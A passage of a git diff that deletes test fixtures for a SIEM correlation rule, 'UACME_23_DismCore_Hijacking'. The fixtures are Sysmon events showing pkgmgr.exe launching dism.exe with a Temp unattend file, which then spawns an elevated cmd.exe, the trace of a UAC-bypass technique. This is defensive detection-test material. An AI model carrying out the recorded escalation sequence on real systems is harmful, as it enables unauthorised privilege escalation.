/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"}
-{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"}
-{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-04T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-04T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"}
-{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-04T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-04T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"}
-
-expect 2 {"correlation_name": "UACME_23_DismCore_Hijacking"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc
deleted file mode 100644
index a1016d4b..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc
+++ /dev/null
@@ -1,4 +0,0 @@
-{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"}
-{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:07:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"